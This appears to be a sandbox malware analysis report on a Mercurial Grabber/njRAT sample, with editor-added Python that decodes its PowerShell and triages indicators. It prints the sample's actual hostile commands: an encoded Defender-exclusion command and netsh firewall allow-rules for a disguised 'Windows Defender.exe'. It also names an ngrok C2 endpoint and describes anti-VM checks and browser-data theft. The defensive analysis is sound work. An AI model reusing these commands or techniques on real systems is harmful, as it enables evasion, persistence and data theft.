Analysis Overview
SHA256
8d38d3866a011792617c9784fc9dc556f0c8c6aeeeb96aef679aea6ff6831028
Threat Level: Known bad
The file 4e6984054c17293752f8d11ccac45e70.exe was found to be: Known bad.
Malicious Activity Summary
Mercurial Grabber Stealer
njRAT/Bladabindi
Looks for VirtualBox Guest Additions in registry
Modifies Windows Firewall
Looks for VMWare Tools registry key
Executes dropped EXE
Drops startup file
Checks BIOS information in registry
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Maps connected drives based on registry
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
Checks SCSI registry key(s)
Modifies system certificate store
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-10-03 23:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-10-03 23:20
Reported
2022-10-03 23:23
Platform
win7-20220812-en
Max time kernel
150s
Max time network
182s
Command Line
Signatures
Mercurial Grabber Stealer
njRAT/Bladabindi
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip4.seeip.org | N/A | N/A |
| N/A | ip4.seeip.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip4.seeip.org | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\output.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Modifies system certificate store
Note: the two thumbprints below are the SHA-1 fingerprints of the public roots DST Root CA X3 (DAC9024F...) and ISRG Root X1 (CABD2A79...), and apps.identrust.com in the Network section is IdenTrust's AIA/CRL host. Those writes are consistent with CryptoAPI fetching and caching a public root chain during the sample's own TLS connections, not with an attacker-installed CA, so treat this signature as a side effect rather than as a persistence or interception indicator.
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe
"C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\output.exe
"C:\Users\Admin\AppData\Local\Temp\output.exe"
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
"C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\mode.com
mode 80,15
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\mode.com
mode 130,30
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1568 -s 1856
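Added example (editor-supplied Python, not part of the sandbox report or of the sample): the powershell.exe argument above is `-EncodedCommand`, which carries the script as base64 of UTF-16LE text, and the author padded it with `<# ... #>` block comments so that the plain script does not match simple string rules. The block below decodes it, strips the junk comments, and then runs a small triage over the command lines listed in this section, flagging the Defender exclusion, the firewall allow-rules for a binary in a user-writable directory, and the total delay introduced by timeout.exe. The regexes and the user-writable path list are assumptions for illustration; the command lines are copied from this report.

```python
"""Decode -EncodedCommand and triage a process chain from a sandbox report (added example)."""
from __future__ import annotations

import base64
import re

# The exact base64 blob from the powershell.exe command line in the report above.
ENCODED_BLOB = (
    "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0A"
    "RQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA"
    "JABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAA"
    "PAAjAGwAbABjACMAPgA="
)

# Command lines copied from the behavioral1 "Processes" section (sample input for the triage).
PROCESS_CHAIN = [
    r'"C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "' + ENCODED_BLOB + '"',
    r'"C:\Users\Admin\AppData\Local\Temp\output.exe"',
    r'"C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"',
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "',
    "chcp 65001",
    "mode 80,15",
    "timeout 3",
    "timeout 2",
    r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE',
    r'netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"',
    r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE',
    "timeout 2",
    "timeout 3",
    "timeout 2",
    "mode 130,30",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...); -ExecutionPolicy must not match.
ENCODED_RE = re.compile(r'-e(?:c|n[a-z]*)?\s+"?([A-Za-z0-9+/=]{16,})"?', re.I)
JUNK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)
# Legacy "netsh firewall" syntax (used by the sample) and the advfirewall form, both with a quoted program path.
NETSH_ALLOW_RES = (
    re.compile(r'netsh\s+firewall\s+add\s+allowedprogram\s+"([^"]+)"', re.I),
    re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*?\bprogram="([^"]+)"', re.I),
)
TIMEOUT_RE = re.compile(r"^timeout(?:\.exe)?\s+(?:/t\s+)?(\d+)", re.I)
# Assumed list of directories a standard user can write to; a firewall exception for a binary there is a red flag.
USER_WRITABLE_RE = re.compile(r"\\AppData\\(?:Local|Roaming)\\|\\Users\\Public\\|\\ProgramData\\", re.I)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, so a UTF-8 decode would show NUL-separated characters."""
    return base64.b64decode(blob).decode("utf-16-le")


def normalize_powershell(script: str) -> str:
    """Drop <# ... #> block comments (junk inserted to break string matching) and collapse whitespace."""
    return " ".join(JUNK_COMMENT_RE.sub(" ", script).split())


def triage_command_line(cmd: str) -> list[str]:
    """Return finding tags for one command line; an empty list means nothing of interest."""
    findings: list[str] = []
    m = ENCODED_RE.search(cmd)
    if m and "powershell" in cmd.lower():
        findings.append("encoded_powershell")
        try:
            script = normalize_powershell(decode_encoded_command(m.group(1)))
        except (ValueError, UnicodeDecodeError):
            findings.append("encoded_powershell_undecodable")
        else:
            if re.search(r"\b(?:Add|Set)-MpPreference\b", script) and "-Exclusion" in script:
                findings.append("defender_exclusion")
    for pattern in NETSH_ALLOW_RES:
        m = pattern.search(cmd)
        if m:
            findings.append("firewall_allow_program")
            if USER_WRITABLE_RE.search(m.group(1)):
                findings.append("firewall_allow_user_writable_path")
    m = TIMEOUT_RE.match(cmd.strip())
    if m:
        findings.append(f"sleep_{m.group(1)}s")
    return findings


def summarize_process_chain(cmds: list[str]) -> dict[str, int]:
    """Count findings across the chain; individual timeout delays are summed into sleep_seconds_total."""
    summary: dict[str, int] = {}
    for cmd in cmds:
        for tag in triage_command_line(cmd):
            if tag.startswith("sleep_"):
                summary["sleep_seconds_total"] = summary.get("sleep_seconds_total", 0) + int(tag[6:-1])
            else:
                summary[tag] = summary.get(tag, 0) + 1
    return summary


if __name__ == "__main__":
    print(normalize_powershell(decode_encoded_command(ENCODED_BLOB)))
    for tag, count in sorted(summarize_process_chain(PROCESS_CHAIN).items()):
        print(f"{tag}: {count}")
```

The decoded script adds the whole user profile and the whole system drive to Defender's exclusion list before output.exe and "Windows Defender.exe" are dropped, which is why the later stages run unhindered on the analysis host; the netsh add/delete/add sequence is the same allow-rule being re-applied after each restart of the batch loop.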
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | ip4.seeip.org | udp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 96.16.53.134:80 | apps.identrust.com | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
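Added example (editor-supplied, not from the report): the Network table above is long because the sandbox logs every connection, and the useful signal is easier to see once rows are grouped by name and port. The block below parses a subset of those rows, drops the 8.8.8.8:53 resolver traffic, and groups the rest. It shows that 6.tcp.eu.ngrok.io:13992 was reached through three different backend addresses (3.69.157.220, 3.66.38.117, 18.197.239.109) within one three-minute run, so the durable indicator for blocking and hunting is the tunnel hostname plus port, not any single IP. The classification lists (tunnel suffixes, IP-lookup hosts, CA infrastructure, abused legitimate services) are assumptions added for illustration.

```python
"""Aggregate a sandbox Network table into stable C2 indicators (added example)."""
from __future__ import annotations

from dataclasses import dataclass

# Rows copied from the behavioral1 Network table above (a subset; the report repeats the ngrok rows many times).
NETWORK_TABLE = """
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | ip4.seeip.org | udp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 96.16.53.134:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
"""

# Assumed classification lists; extend them for your own environment.
TUNNEL_SUFFIXES = (".ngrok.io",)
IP_LOOKUP_HOSTS = {"ip4.seeip.org", "ip-api.com"}
CA_INFRA_HOSTS = {"apps.identrust.com"}
ABUSED_SERVICE_HOSTS = {"discord.com"}  # the report's "Legitimate hosting services abused" signature


@dataclass(frozen=True)
class Conn:
    country: str
    ip: str
    port: int
    domain: str
    proto: str


def parse_network_table(text: str) -> list[Conn]:
    """Parse '| Country | ip:port | Domain | Proto |' rows; tolerates rows where an empty Domain cell was shifted."""
    conns: list[Conn] = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        if proto == "" and domain.lower() in ("tcp", "udp"):
            domain, proto = "", domain
        ip, port = dest.rsplit(":", 1)
        conns.append(Conn(country, ip, int(port), domain, proto.lower()))
    return conns


def classify(domain: str) -> str:
    d = domain.lower()
    if d.endswith(TUNNEL_SUFFIXES):
        return "tunnel_service"
    if d in IP_LOOKUP_HOSTS:
        return "ip_lookup"
    if d in CA_INFRA_HOSTS:
        return "ca_infrastructure"
    if d in ABUSED_SERVICE_HOSTS:
        return "abused_legit_service"
    return "other"


def summarize_endpoints(conns: list[Conn]) -> dict[tuple[str, int], dict]:
    """Group non-DNS connections by (domain, port), collecting the backend IPs seen and a connection count."""
    summary: dict[tuple[str, int], dict] = {}
    for c in conns:
        if c.port == 53 and c.proto == "udp":
            continue  # sandbox resolver traffic; the name is already captured on the data rows
        entry = summary.setdefault((c.domain, c.port), {"ips": set(), "count": 0, "class": classify(c.domain)})
        entry["ips"].add(c.ip)
        entry["count"] += 1
    return summary


def c2_candidates(summary: dict[tuple[str, int], dict]) -> list[str]:
    """Endpoints worth blocking by name:port: tunnel services, abused services, and unclassified non-web ports."""
    out = []
    for (domain, port), e in summary.items():
        if e["class"] in ("tunnel_service", "abused_legit_service") or (e["class"] == "other" and port not in (80, 443)):
            out.append(f"{domain}:{port}")
    return sorted(out)


if __name__ == "__main__":
    summary = summarize_endpoints(parse_network_table(NETWORK_TABLE))
    for (domain, port), e in sorted(summary.items()):
        print(f"{domain or '-'}:{port} {e['class']} count={e['count']} ips={sorted(e['ips'])}")
    print("candidates:", c2_candidates(summary))
```

The IP-lookup hosts are reconnaissance rather than command and control and are noisy as block-list entries, which is why they are classified but not returned as candidates.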
Files
memory/1004-54-0x0000000075211000-0x0000000075213000-memory.dmp
memory/1632-55-0x0000000000000000-mapping.dmp
memory/1568-58-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
C:\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
C:\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
memory/884-63-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
memory/920-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat
| MD5 | 4b4e566a986fe97ba2d89f9c64a24c64 |
| SHA1 | 18bba3d5058b4b53fc99f9fba94110f4e8f8c2ea |
| SHA256 | 2950d0e125c3d1d11be27388ca83ef5d3fbcd71e49c0ed4eb0e0373340707a97 |
| SHA512 | 32e39cbd0ba54cd1bcf25158774a44060d65bdeef9de0986be5267c3da229d8e743afaa67b98492172b7b59cd3fb0cf9e0c5dc149651a3518479ac8af677cee8 |
memory/684-68-0x0000000000000000-mapping.dmp
memory/1568-69-0x00000000001C0000-0x00000000001D0000-memory.dmp
memory/1540-71-0x0000000000000000-mapping.dmp
memory/884-73-0x0000000073E10000-0x00000000743BB000-memory.dmp
memory/432-72-0x0000000000000000-mapping.dmp
memory/1632-74-0x0000000073E10000-0x00000000743BB000-memory.dmp
memory/336-75-0x0000000000000000-mapping.dmp
memory/1632-76-0x0000000073E10000-0x00000000743BB000-memory.dmp
memory/824-77-0x0000000000000000-mapping.dmp
memory/1752-79-0x0000000000000000-mapping.dmp
memory/1464-80-0x0000000000000000-mapping.dmp
memory/1076-83-0x0000000000000000-mapping.dmp
memory/1668-84-0x0000000000000000-mapping.dmp
memory/1820-85-0x0000000000000000-mapping.dmp
memory/1748-86-0x0000000000000000-mapping.dmp
memory/884-87-0x0000000073E10000-0x00000000743BB000-memory.dmp
memory/1516-88-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-10-03 23:20
Reported
2022-10-03 23:24
Platform
win10v2004-20220812-en
Max time kernel
160s
Max time network
181s
Command Line
Signatures
Mercurial Grabber Stealer
njRAT/Bladabindi
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
